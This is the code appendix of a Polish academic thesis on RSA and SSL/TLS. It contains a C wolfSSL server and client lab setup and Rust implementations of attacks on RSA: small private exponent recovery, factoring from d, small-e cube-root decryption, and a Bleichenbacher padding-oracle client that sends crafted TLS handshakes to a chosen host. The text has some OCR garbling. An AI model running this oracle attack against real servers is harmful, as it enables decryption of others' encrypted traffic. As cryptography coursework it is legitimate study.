           fprintf(stderr, "ERROR: failed to create CTX (context)\n");
46
          return -1;
```

```
48
       }
49
50
       if(wolfSSL_CTX_use_certificate_file(ctx, CERT_FILE, SSL_FILETYPE_PEM)
                != SSL_SUCCESS) {
51
           fprintf(stderr, "ERROR: failed to load certificate %s\n", CERT_FILE);
52
53
           return -1;
54
       }
55
56
       if(wolfSSL_CTX_use_PrivateKey_file(ctx, KEY_FILE, SSL_FILETYPE_PEM)
57
                != SSL_SUCCESS) {
           fprintf(stderr, "ERROR: failed to load private key file %s\n", KEY_FILE);
58
59
           return -1;
60
       }
61
62
       if(wolfSSL_CTX_set_cipher_list(ctx, ciphers) != SSL_SUCCESS) {
63
           fprintf(stderr, "ERROR: failed to set cipher list\n");
64
           return -1;
65
66
67
       memset(&servAddr, 0, sizeof(servAddr));
68
       servAddr.sin_family = AF_INET;
69
70
       servAddr.sin_port = htons(DEFAULT_PORT);
       servAddr.sin_addr.s_addr = INADDR_ANY;
71
72
73
       if(bind(sockfd, (struct sockaddr*) &servAddr, sizeof(servAddr)) == -1) {
           fprintf(stderr, "ERROR: Failed to bind to port\n");
74
75
           return -1;
76
       }
77
78
       if(listen(sockfd, 5) == -1) {
           fprintf(stderr, "ERROR: Failed to listen\n");
79
80
           return -1;
81
82
       // Connection skeleton
83
       char * reply = "Here is some data from the server. Use it well";
84
85
       char * password = "password123";
86
       char * shutdown_message = "Shutting down...";
87
       ShowCiphers();
88
       while(!shutdown) {
89
           printf("Waiting for connection...\n");
90
           if((connd = accept(sockfd, (struct sockaddr*)&clientAddr, &size)) == -1) {
91
                fprintf(stderr, "ERROR: connection refused\n");
92
93
                return -1;
94
95
           printf("Accepted connection from %s:%d\n",
96
                    inet_ntoa(clientAddr.sin_addr), clientAddr.sin_port);
97
           if((ssl = wolfSSL_new(ctx)) == NULL) {
98
                fprintf(stderr, "ERROR: failed to create WOLFSSL object\n");
99
100
               return -1;
101
```

```
102
           wolfSSL_set_fd(ssl, connd);
103
104
           memset(buff, 0, sizeof(buff));
            if((err = wolfSSL_read(ssl, buff, sizeof(buff)-1)) == -1) {
105
106
                fprintf(stderr, "ERROR: failed to read or handshake error\n");
107
                fprintf(stderr, "ERROR: Resetting connection...\n");
108
                wolfSSL_write(ssl, "ERROR", sizeof("ERROR"));
109
                wolfSSL_free(ssl);
110
                close(connd);
111
                continue;
112
                //return -1;
113
114
           printf("Message from client: %s\n", buff);
115
            if(strncmp(buff, "get", 3) == 0) {
116
117
                memset(buff, 0, sizeof(buff));
118
                memcpy(buff, password, strlen(password));
                len = strnlen(buff, sizeof(buff));
119
           } else if(strncmp(buff, "shutdown", 8) == 0) {
120
121
                printf("Shutting down\n");
122
                memset(buff, 0, sizeof(buff));
123
                memcpy(buff, shutdown_message, strlen(shutdown_message));
124
                len = strnlen(buff, sizeof(buff));
125
                shutdown = 1;
126
           } else {
127
                memset(buff, 0, sizeof(buff));
128
                memcpy(buff, reply, strlen(reply));
129
                len = strnlen(buff, sizeof(buff));
130
131
132
           if(wolfSSL_write(ssl, buff, len) != len) {
                fprintf(stderr, "ERROR: failed to write data\n");
133
134
                return -1;
135
136
137
            wolfSSL_free(ssl);
138
           close(connd);
139
       printf("Server closed\n");
140
141
142
       wolfSSL_CTX_free(ctx);
143
       wolfSSL_Cleanup();
144
       close(sockfd);
145
       return 0;
146 }
```

Dodatek B

Kod programu klienta wykorzystanego w ostatnim rozdziale.

```
1 #include <stdlib.h>
2 #include <stdio.h>
3 #include <string.h>
4
5 #include <sys/socket.h>
6 #include <arpa/inet.h>
7 #include <netinet/in.h>
  #include <unistd.h>
9 #include <wolfssl/ssl.h>
10
11 #define DEFAULT_PORT 9001
12
13 #define CERT_FILE "./cert/rootCA.pem"
14
15 int main(int argc, char ** argv) {
16
      int sockfd;
      struct sockaddr_in servAddr;
17
18
      char buff[255];
      size_t len;
19
      WOLFSSL_CTX * ctx;
20
      WOLFSSL * ssl;
21
22
23
      wolfSSL_Init();
24
      if(argc != 2) {
25
           printf("Usage: %s <IPV4 address>\n", argv[0]);
27
           return 0;
28
29
      if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
30
31
           fprintf(stderr, "ERROR: Failed to create socket\n");
32
           return -1;
      }
33
34
      if((ctx = wolfSSL_CTX_new(wolfTLSv1_2_client_method())) == NULL) {
35
36
           fprintf(stderr, "ERROR: failed to create CTX (context)\n");
37
           return -1;
38
      }
39
      if(wolfSSL_CTX_load_verify_locations(ctx, CERT_FILE, NULL) != SSL_SUCCESS) {
40
           fprintf(stderr, "ERROR: failed to load CA list %s\n", CERT_FILE);
41
           return -1;
42
43
44
45
      memset(&servAddr, 0, sizeof(servAddr));
46
      servAddr.sin_family = AF_INET;
```

```
48
       servAddr.sin_port = htons(DEFAULT_PORT);
49
50
       if(inet_pton(AF_INET, argv[1], &servAddr.sin_addr) != 1) {
           fprintf(stderr, "ERROR: invalid server adress\n");
51
52
           return -1;
53
      7
54
55
       if(connect(sockfd, (struct sockaddr*) &servAddr, sizeof(servAddr)) == -1) {
56
           fprintf(stderr, "ERROR: Failed to connect\n");
57
           return -1;
      }
58
59
       if((ssl = wolfSSL_new(ctx)) == NULL) {
60
           fprintf(stderr, "ERROR: failed to create WOLFSSL object\n");
61
62
           return -1;
63
64
       wolfSSL_set_fd(ssl, sockfd);
65
       if (wolfSSL_connect(ssl) != SSL_SUCCESS) {
66
67
           fprintf(stderr, "ERROR: failed to connect with wolfssl\n");
68
           return -1;
69
      }
70
71
       printf("Chiper used: %s\n", wolfSSL_get_cipher(ssl));
72
       printf("get - get password, shutdown - shutdown\n");
73
       printf("Message for server: ");
      memset(buff, 0, sizeof(buff));
74
75
       fgets(buff, sizeof(buff), stdin);
76
       len = strnlen(buff, sizeof(buff));
77
78
       if(wolfSSL_write(ssl, buff, len) != len) {
           fprintf(stderr, "ERROR: failed to write to server\n");
79
80
           return -1;
81
82
       memset(buff, 0, sizeof(buff));
83
       if(wolfSSL_read(ssl, buff, sizeof(buff)-1) == -1) {
84
85
           fprintf(stderr, "ERROR: failed to read from server\n");
86
87
88
       printf("Message from server: %s\n", buff);
89
90
       wolfSSL_free(ssl);
       wolfSSL_CTX_free(ctx);
91
       wolfSSL_Cleanup();
92
93
       close(sockfd);
94
       return 0;
95 }
```

Dodatek C

Kod programu zawierający pomocnicze funkcje do wybranych ataków na system RSA.

```
1 use rug::Integer;
2 use openssl::ssl::{SslConnector, SslMethod, SslVerifyMode};
3 use std::error::Error;
4 use std::net::{TcpStream, Shutdown};
5 use std::io::{Write, Read};
6 use hex::FromHex;
7
  use std::time::Duration;
8
9
  pub fn u8_to_dec(digits: Vec<u8>) -> i128 {
10
      let mut tmp: String;
      let mut ret: i128;// = 0;
11
12
      let mut ret1: i128 = 0;
13
      let n = digits.len();
14
      for d in digits.iter().enumerate() {
15
          ret = 0;
          tmp = d.1.to_string();
16
17
          let len = tmp.len();
          for ch in tmp.chars().enumerate() {
18
               ret += ch.1.to_digit(10).unwrap() as i128 * 8_i128.pow((ch.0 + len - 1) as u32);
19
20
21
          print!("{} ", ret);
22
           ret1 += ret * 10_i128.pow((d.0 + n - 1) as u32);
23
24
      print!("\n");
25
      return ret1;
26 }
27
28
  pub fn euclides(a: i128, b: i128) -> (i128, i128, i128) {
29
      let mut x1: i128 = 1;
30
      let mut y1: i128 = 0;
31
      let mut x2: i128 = 0;
32
      let mut y2: i128 = 1;
33
      let mut q: i128;
34
      let mut r1: i128 = a;
35
      let mut r2: i128 = b;
36
      while r2 != 0 {
          q = r1 / r2;
37
           (r1, r2) = (r2, r1 \% r2);
38
39
           (x1, x2) = (x2, x1 - x2 * q);
40
           (y1, y2) = (y2, y1 - y2 * q);
41
42
       return (r1, x1, y1);
43 }
44
45 pub fn euclides_gmp(a: Integer, b: Integer) -> (Integer, Integer, Integer) {
     let mut x1: Integer = Integer::from(1);
```

```
47
       let mut y1: Integer = Integer::from(0);
       let mut x2: Integer = Integer::from(0);
48
49
       let mut y2: Integer = Integer::from(1);
50
       let mut q: Integer;
51
       let mut tmp: Integer;
52
       let mut r1: Integer = a;
       let mut r2: Integer = b;
53
       while r2 != 0 {
54
55
           tmp = r2.clone();
56
           (q, r2) = r1.div_{rem}(r2);
57
           r1 = tmp;
58
           (x1, x2) = (x2.clone(), x1 - x2 * q.clone());
59
           (y1, y2) = (y2.clone(), y1 - y2 * q);
60
       return (r1, x1, y1);
61
62
63
64
   pub fn get_rsa_from_server(host: String, port: u16) -> (Integer, Integer){
       let mut connector_builder = SslConnector::builder(SslMethod::tls()).unwrap();
65
66
       connector_builder.set_verify(SslVerifyMode::NONE);
67
       let connector = connector_builder.build();
68
       let tmp: String = host.clone() + ":" + &port.to_string();
69
70
       let stream = TcpStream::connect(tmp).unwrap();
       let stream = connector.connect(&host, stream).unwrap();
71
72
73
       let key = stream.ssl().peer_certificate().unwrap().public_key().unwrap();
       let n = key.rsa().unwrap().n().to_owned();
74
       let e = key.rsa().unwrap().e().to_owned();
75
76
77
       let n_ret = n.unwrap().to_dec_str().unwrap().parse::<Integer>();
       let e_ret = e.unwrap().to_dec_str().unwrap().parse::<Integer>();
78
79
       return (n_ret.unwrap(), e_ret.unwrap());
80
   }
81
82
   pub fn bleichenbacher_oracle(host: String, port: u16, pms: &Vec<u8>)
           -> Result < String, Box < dyn Error >> {
83
84
85
       let ch_tls = Vec::from_hex("16030100610100005d
       03034f20d66cba6399e552fd735d75feb0eeae2ea2ebb357c9004e21d0c2574f837a000010009
86
87
       04020403030103020303020102020203".replace("\n","")
88
89
           .replace(" ","")).unwrap();
90
       let ch = ch_tls.as_slice();
91
92
       let ccs = Vec::from_hex("000101").unwrap();
       let enc = Vec::from_hex("005091a3b6aaa2b64d126e5583b04c113259c4efa4
93
94
       8\,e40\,a19\,b8\,e5f2542\,c3\,b1\,d30f8\,d80\,b7582\,b72f08\,b21\,df\,cbff09d4\,b281676\,a0f\,b40\,d48\,c20\,c4f38
95
       8617ff5c00808a96fbfe9bb6cc631101a6ba6b6bc696f0".replace("\n","")
           .replace(" ","")).unwrap();
96
97
98
       let tmp: String = host.clone() + ":" + &port.to_string();
       let mut stream = TcpStream::connect(&tmp).unwrap();
99
100
       stream.set_nodelay(true).expect("set_nodelay failed");
```

```
101
        stream.set_write_timeout(Some(Duration::new(5,0)))
102
           .expect("failed to set nonblocking");
103
        stream.set_read_timeout(Some(Duration::new(5,0)))
104
            .expect("failed to set nonblocking");
105
106
        stream.write_all(&ch)?;
107
108
       // let cke_2nd_prefix = format!("\{:x\}", modulus_bytes + 6) + "1000" +
109
            &format!("{:x}",modulus_bytes + 2) + &format!("{:x}",modulus_bytes);
110
       let cke_2nd_prefix = b"\x01\x06\x10\x00\x01\x02\x01\x00";
111
112
       let mut buff = vec![0; 4096];
113
       stream.read(&mut buff)?;
114
115
       let cke_version = Vec::from(&buff[9..11]);
116
117
       let mut tmp: Vec<u8> = Vec::from([b"\x16"[0]]);
118
       tmp = [tmp, cke_version.clone()].concat();
        stream.write(&tmp)?;
119
120
121
       stream.write(cke_2nd_prefix)?;
122
123
       stream.write(&pms)?;
124
125
       tmp = Vec::from_hex("14").unwrap();
126
       tmp = [tmp, cke_version.clone()].concat();
127
       tmp = [tmp, ccs].concat();
128
        stream.write(&tmp)?;
129
130
       tmp = Vec::from_hex("16").unwrap();
131
       tmp = [tmp, cke_version.clone()].concat();
132
       tmp = [tmp, enc].concat();
133
       stream.write(&tmp)?;
134
135
       let bend = stream.read_to_end(&mut buff)?;
136
        if bend == 0 {
137
           stream.shutdown(Shutdown::Both)?;
138
           return Ok(String::from("Ok"))
139
       }
140
141
        stream.shutdown(Shutdown::Both)?;
142
       Ok(String::new())
143 }
144
145 | #[cfg(test)]
146 mod test {
147
       use crate::euclides;
148
       use crate::euclides_gmp;
149
       use crate::Integer;
150
151
       #[test]
152
       fn euclides_test() {
153
           let res = euclides(240, 46);
           assert_eq!(res.0, res.1 * 240 + res.2 * 46);
154
```

```
155
       }
156
157
       #[test]
158
       fn euclides_gmp_test() {
159
           let res = euclides_gmp(Integer::from(240),
160
           Integer::from(46));
161
            assert_eq!(res.0, res.1 * 240 + res.2 * 46);
162
       }
163 }
```

Dodatek D

Kod programu zawierający główne przykłady ataków na system RSA.

```
1 use hex::FromHex;
2 use rug::{rand::RandState, Integer, integer::Order};
3 use ssl_attack::{euclides_gmp, get_rsa_from_server, bleichenbacher_oracle};
4 use std::{env, io::{Write}};
  static CHOICE: [&str; 5] = ["RSA Example",
                           "Small Private Exponent Example",
8
                           "Facotrization of N given d",
9
                           "Bleichenbacher attack",
10
                           "Small public exponent example"];
11
12
  fn help() {
      println!("Usage: ssl_attack <OPTION> [host] [port]\nOPTION:");
13
      for (i, line) in CHOICE.iter().enumerate() {
14
15
         println!("\t{} - {})", i, line);
16
17 }
18
  fn small_private_exponent() {
19
     let n_str: &str = "12264905917816263700023515448393777708967552173712358109109
20
      21
22
     782826738112981152721181778312786319011587166390909385674403046948259826198367
23
      24
     8215788728105359";
     let e_str: &str = "84617501727888423821133596441571121520815397643225089934444
25
     436349502681518935293555531766824573098497372564373307288536035855002783639020\\
      298535325660076402607034399890585937330747894532573222022139028813064683258751
27
      28
29
      480750109412593";
30
     let n: Integer = n_str.parse::<Integer>().unwrap();
31
     let e: Integer = e_str.parse::<Integer>().unwrap();
32
      let message: &str = "Other secret message";
33
34
      let m: Integer = Integer::from_digits(message.as_bytes(), Order::MsfBe);
35
     let c = m.pow_mod(&e, &n).unwrap();
36
37
     let mut num: Integer = e.clone();
38
      let mut den: Integer = n.clone();
      let mut q: Integer;
39
     let (_, mut r) = num.clone().div_rem(den.clone());
40
41
     let mut d1: Integer = Integer::from(1);
     let mut d2: Integer = Integer::from(0);
42
     let mut d: Integer;
43
     let mut m: Integer;
44
45
46
     while r != Integer::ZERO {
         num = den.clone();
```

```
den = r.clone();
48
49
           (q, r) = num.clone().div_rem(den.clone());
50
          d = q.clone() * d1.clone() + d2.clone();
51
52
          m = match c.clone().pow_mod(&d, &n) {
53
              0k(m) => m,
54
              Err(_) => unreachable!(),
55
          }:
56
57
          let arr: Vec<u8> = m.to_digits::<u8>(Order::MsfLe);
          let mut str: String = String::new();
58
59
          for i in arr {
60
              str.push(i as char);
          }
61
          if str.is_ascii() {
62
63
              println!("Decrypted message: {}", str);
64
              break;
65
          d2 = d1.clone();
66
67
          d1 = d.clone();
68
       println!("Here is your private key: {}", d1);
69
70
  }
71
72
   fn small_public_exponent() {
73
       let n_str: \&str = "29331922499794985782735976045591164936683059380558950386560
       160105740343201513369939006307531165922708949619162698623675349030430859547825
74
75
       956111848686906152664473350940486507451771223435835260168971210087470894448460
76
77
       745593956840586530527915802541450092946574694809584880896601317519794442862977
78
       471129319781313161842056501715040555964011899589002863730868679527184420789010\\
       551475067862907739054966183120621407246398518098981106431219207697870293412176
79
80
       81
       756938687673";
82
       let n: Integer = n_str.parse::<Integer>().unwrap();
83
       let e: Integer = Integer::from(3);
84
85
       let message: &str = "Super secret message";
86
       let m: Integer = Integer::from_digits(message.as_bytes(), Order::MsfBe);
       let c: Integer = m.pow_mod(&e, &n).unwrap();
87
88
       println!("Here is your ciphertext: {}", c);
89
90
       let (res, k) = small_e(n, c, e);
       println!("Decrypted message: {}", res);
91
92
       println!("k is: {}", k);
93
94
       pub fn small_e(n: Integer, c: Integer, e: Integer) -> (String, i32) {
95
          let mut arr: Vec<u8>;
96
          let mut m: Integer;
97
          for i in 0..10000 {
98
99
              m = c.clone() + i*n.clone();
100
              m = m.root(e.to_u32_wrapping());
101
              arr = m.to_digits::<u8>(Order::MsfBe);
```

```
102
            let mut str: String = String::new();
103
            for j in arr.clone() {
104
                str.push(j as char);
105
            }
106
            if str.is_ascii() {
107
                return (str,i);
108
            }
109
         }
110
         return (String::from(""), -1);
111
112 }
113
114 fn factor_n_example() {
      let n_str: \&str = "12264905917816263700023515448393777708967552173712358109109
115
116
      117
118
      119
      8215788728105359";
      let e_str: &str = "84617501727888423821133596441571121520815397643225089934444
120
121
      436349502681518935293555531766824573098497372564373307288536035855002783639020\\
122
      123
124
      480750109412593";
125
      let n: Integer = n_str.parse::<Integer>().unwrap();
126
      let e: Integer = e_str.parse::<Integer>().unwrap();
127
      let d: Integer = Integer::from(65537);
128
129
      let k: Integer = e*d - Integer::from(1);
130
      let mut t_{int}: u16 = 0;
131
      let mut r: Integer = k.clone();
132
      while r.is_even() {
133
         r = r/2;
134
         t_int += 1;
135
136
      let t: Integer = Integer::from(t_int);
137
138
      println!("k = 2^{{}} * {} * {}, t, r);
139
      let mut x: Integer;
140
      let mut p: Integer;
      let mut q: Integer;
141
142
      for i in 1..t_int {
143
         let tmp = &k / Integer::from((2 as u32).pow(i.into()));
144
         x = Integer::from(3).pow_mod(&tmp, &n).unwrap();
         p = (&x - Integer::from(1)).gcd(&n);
145
146
         q = (&x + Integer::from(1)).gcd(&n);
147
         if p.clone() == Integer::from(1) || q.clone() == Integer::from(1) {
148
            continue;
149
         }
150
         if n == p.clone() * q.clone() {
151
            println!("Here is p: {}nHere is q: {}", &p, &q);
152
         }
153
      }
154 }
155
```

```
156 fn rsa_example() {
157
        let p: Integer = Integer::from(7919);
158
        let q: Integer = Integer::from(6841);
        let n: Integer = p.clone() * q.clone();
159
        let phi: Integer = (p - 1) * (q - 1);
160
161
        let mut rand: RandState = RandState::new();
162
        let mut e: Integer = phi.clone().random_below(&mut rand);
163
        let mut res = euclides_gmp(e.clone(), phi.clone());
164
        while res.0 != 1 {
165
            e = phi.clone().random_below(&mut rand);
166
            res = euclides_gmp(e.clone(), phi.clone());
167
        }
168
        let d: Integer;
        if res.1 < 0 {
169
170
            d = res.1 + n.clone();
        } else {
171
172
            d = res.1;
173
        println!("Generated key ({}, {}), {}", n, e, d);
174
175
176
        let text: String = String::from("Hi!");
        let mut bytes: Vec<u8> = Vec::new();
177
178
        for i in text.chars() {
179
            bytes.push(i as u8);
180
181
        let m: i128 = Integer::from_digits(&bytes, Order::MsfLe).to_i128_wrapping();
182
        println!("Message to encrypt: {} = {}", text, m);
183
        let c: Integer = match Integer::from(m).pow_mod(&e.clone(), &n.clone()) {
184
185
            Ok(c) => c, //.to_i128_wrapping(),
186
            Err(_) => unreachable!(),
187
        };
188
189
        print!("Encrypted message: {} = [", &c);
        for i in c.to_digits::<u8>(Order::MsfBe) {
190
191
            print!("{},", i);
192
193
        println!("]");
194
195
        let dec = match Integer::from(c).pow_mod(&d, &n) {
196
            Ok(dec) => dec.to_i128_wrapping(),
197
            Err(_) => unreachable!(),
198
        };
        let mut tmp: String = String::new();
199
200
        for i in Integer::from(dec).to_digits::<u8>(Order::MsfBe) {
201
            tmp.push(i as char);
202
203
        println!("Decrypted message: {} = {}", dec, tmp);
204 }
205
206 fn bleichenbacher_example(host: String, port: u16) {
207
208
        let (n, e) = get_rsa_from_server(host.clone(), port.clone());
209
        println!("n: {}\ne: {}", n, e);
```

```
210
211
       let modulus_bytes = n.to_digits::<u8>(Order::MsfLe).len();
212
       let modulus_bits = &modulus_bytes * 8;
213
214
       println!("Modulus bits: {}", modulus_bits);
215
       println!("Modulus bytes: {}", modulus_bytes);
216
217
       let pad_len = (modulus_bytes - 48 - 3) * 2;
218
       let len = (pad_len / 2) as i32 + 1;
219
       let mut rnd_pad = String::new();
220
       for _i in 1..len {
221
           rnd_pad += "abcd";
222
223
       rnd_pad.drain(pad_len..rnd_pad.len());
224
       println!("Pad len: {}\nRnd pad len: {}", pad_len, rnd_pad.len());
225
226
       let hex_test = Vec::from_hex("aa11").unwrap();
227
       let int_test = Integer::from_digits(hex_test.as_slice(), Order::MsfLe);
       println!("Integer: {}", int_test);
228
229
230
       let rnd_pms = "aa1122334455667788991122334455667788
           99112233445566778899112233445566778899112233445566778
231
           899".replace("\n","").replace(" ","");
232
233
       let pms_good_str = String::from("0002") + &rnd_pad + "000303" + &rnd_pms;
234
       let pms_good_vec = Vec::from_hex(pms_good_str).unwrap();
235
       let pms_good_in = Integer::from_digits(pms_good_vec.as_slice(), Order::MsfLe);
236
       // wrong first two bytes
237
       let pms_bad_str1 = String::from("4117") + &rnd_pad + "00" + "0303" + &rnd_pms;
238
       let pms_bad_vec1 = Vec::from_hex(pms_bad_str1).unwrap();
239
       let pms_bad_in1 = Integer::from_digits(pms_bad_vec1.as_slice(), Order::MsfBe);
240
       // 0x00 on a wrong position, also trigger older JSSE bug
       let pms_bad_str2 = String::from("0002") + &rnd_pad + "11" + &rnd_pms + "0011";
241
242
       let pms_bad_in2 = Integer::from_digits(pms_bad_str2.as_bytes(), Order::MsfBe);
243
       // no 0x00 in the middle
       let pms_bad_str3 = String::from("0002") + &rnd_pad + "11" + "1111" + &rnd_pms;
244
245
       let pms_bad_in3 = Integer::from_digits(pms_bad_str3.as_bytes(), Order::MsfBe);
       // wrong version number (according to Klima / Pokorny / Rosa paper)
246
247
       let pms_bad_str4 = String::from("0002") + &rnd_pad + "00" + "0202" + &rnd_pms;
248
       let pms_bad_in4 = Integer::from_digits(pms_bad_str4.as_bytes(), Order::MsfBe);
249
250
       let pms_good = pms_good_in.pow_mod(&e, &n).unwrap()
251
            .to_digits::<u8>(Order::MsfBe);
252
       println!("pms good {}", pms_good.as_slice().escape_ascii().to_string());
253
       println!("length {}", pms_good.len());
254
       let pms_bad1 = pms_bad_in1.pow_mod(&e, &n).unwrap()
255
            .to_digits::<u8>(Order::MsfBe);
256
       let pms_bad2 = pms_bad_in2.pow_mod(&e, &n).unwrap()
257
           .to_digits::<u8>(Order::MsfBe);
258
       let pms_bad3 = pms_bad_in3.pow_mod(&e, &n).unwrap()
259
            .to_digits::<u8>(Order::MsfBe);
260
       let pms_bad4 = pms_bad_in4.pow_mod(&e, &n).unwrap()
261
           .to_digits::<u8>(Order::MsfBe);
262
263
       let good = bleichenbacher_oracle(host.clone(), port.clone(), &pms_good);
```

```
264
        let bad1 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad1);
265
        let bad2 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad2);
266
        let bad3 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad3);
267
        let bad4 = bleichenbacher_oracle(host.clone(), port.clone(), &pms_bad4);
268
269
        println!("is good good: {}, {}", good.is_ok(), good.unwrap());
270
        println!("is bad1 good: {}, {}", bad1.is_ok(), bad1.unwrap_or_default());
        println!("is bad2 good: {}, {}", bad2.is_ok(), bad2.unwrap_or_default());
271
        println!("is bad3 good: {}, {}", bad3.is_ok(), bad3.unwrap_or_default());
272
273
        println!("is bad4 good: {}, {}", bad4.is_ok(), bad4.unwrap_or_default());
274
275
        //blinding
276
        let c_str = "49 2d ab 7c 1f 1d 33 db d1 d6 db e7 57
                c8 ec 47 31 f4 3c bf 43 94 16 85 6d b2 65 97
277
                07 59 e7 d8 43 9f 8e 46 cc a1 8b c7 28 df e0
278
                67 93 03 d2 66 c1 44 ea 05 e4 51 2c 6f 23 42
279
280
                d6 09 e4 36 37 6a 72 8d cd a7 6f 4a 75 01 c2
                ef 8b 45 a8 39 e9 3a 5a 07 6b 29 35 3d 4d 9e
281
                15 59 06 6c d4 61 21 8c c1 8e e2 89 7d b9 e7
282
283
                f7 d6 66 9b 66 54 2f 4a 2d d0 9c ac f1 99 4f
                49 67 61 01 0d 5f a2 83 3a 9c 27 2f 64 74 6a
284
                24 c4 b8 a9 9c e2 a3 df b8 68 9f 23 9b 73 6e
285
                6a fa 2a a6 d0 a4 94 3c 94 25 f8 19 f4 87 4d
286
                5f be 0c 97 a0 33 e3 1e dc d9 5b 46 c4 b1 88
287
288
                37 22 14 80 07 22 4c a8 c8 da d7 4f 48 06 48
                d4 d5 3e 8a 73 74 aa cd 55 b2 64 bc 77 73 40
289
                7b 96 6e 2a 72 e7 39 4e 54 f2 5b b7 cc eb c5
290
291
                73 36 cc d0 66 e1 35 38 2e cb 50 29 38 f5 35
                a5 1f f0 74 95 5a 64 4a 1f b6 88 d1 6d c5 0c
292
293
                6a da a7":
294
        let c = Vec::from_hex(c_str.replace(" ","").replace("\n","")).unwrap();
295
        let mut count = 0;
296
        let mut s0 = 1;
297
        let mut c0 = Integer::from(s0).pow_mod(&e, &n).unwrap()
298
            * Integer::from_digits(&c, Order::MsfBe);
299
        loop {
300
            if count % 1000 == 0 {
301
                println!("{} query", count);
302
            }
303
            match bleichenbacher_oracle(host.clone(),
304
                port.clone(),
305
                &c0.to_digits::<u8>(Order::MsfBe)) {
306
                    0k(_) => break,
                    Err(_) => ()
307
308
                }:
309
            s0 += 1;
310
            c0 = Integer::from(s0).pow_mod(&e, &n).unwrap()
311
                * Integer::from_digits(&c, Order::MsfBe);
312
            count += 1;
313
        }
314
        println!("s0: {}", s0);
315 }
316
317 fn main() {
```

```
318
319
        // can arguments be overflown ?
320
        let args: Vec<String> = env::args().collect();
321
322
        let mut line_buffer = String::new();
323
        let choice: String;
324
       let decision:i8;
325
        if args.len() < 2 {
326
            help();
327
            print!("Choose what you want to run [0-1]: ");
328
            std::io::stdout().flush().unwrap();
            choice = match std::io::stdin().read_line(&mut line_buffer) {
329
330
                Ok(_) => line_buffer.replace("\n", ""),
                Err(_) => String::from("-1"),
331
332
            };
333
        } else {
334
            choice = String::from(&args[1]);
335
336
337
        decision = match choice.parse::<i8>() {
338
            Ok(dec) => dec,
            Err(_) => -1,
339
340
       };
341
342
        match decision {
            0 => rsa_example(),
343
            1 => small_private_exponent(),
344
345
            2 => factor_n_example(),
            3 => {
346
347
                if args.len() > 3 {
348
                    bleichenbacher_example(args[2].clone(),
                        args[3].parse::<u16>().unwrap());
349
350
                } else {
351
                    println!("Needs host and port argument!");
352
                }
353
            },
354
            4 => small_public_exponent(),
355
            _ => help(),
356
        }
357 }
```

Strzeszczenie

Celem pracy jest przedstawienie systemu kryptograficznego RSA z wybranymi atakami na ten system oraz przedstawienie podstawowych pojęć dotyczących protokołu SSL/TLS. Opisano podstawowe pojęcia matematyczne służące do zrozumienia działania systemu RSA oraz niektórych ataków na ten system. Został ponadto przedstawiony własny przykład działania systemu RSA. Dla wybranych ataków na ten system została także zrobiona implementacja w kodzie posługując się nowoczesnym językiem programowania Rust. Protokół SSL/TLS został omówiony na podstawie własnego przykładu. Jeden z przedstawionych ataków na system RSA korzystający z przedstawionego protokołu SSL/TLS, został on omówiony i w części zaimplementowany w kodzie. Do tego ataku stworzono własny serwer napisany w znanym języku programowania C. Atak został w części przeprowadzony ze względu na słabą wyrocznie tego serwera. Brak wyników w dużym okresie czasowym natomiast potwierdził słabość tej wyroczni.

Abstract

This paper's purpose is to show the RSA cryptosystem with some chosen attacks on this system and to show basic concepts regarding the SSL/TLS protocol. Mathematical principles are described to help understand the functioning of the RSA cryptosystem and some of the chosen attacks on this cryptosystem. Moreover, a personal example for this cryptosystem is illustrated. For some of the chosen attacks an implementation was written in Rust, a modern programming language. The SSL/TLS protocol is described using a very own example. One of the chosen attacks on the RSA cryptosystem, which uses the SSL/TLS protocol, is illustrated and partially code implemented. For this attack a personal server was written using C, a known programming language. The attack was partially completed due to the server's weak oracle. The lack of results in a long period of time, though, confirmed the oracle's weakness.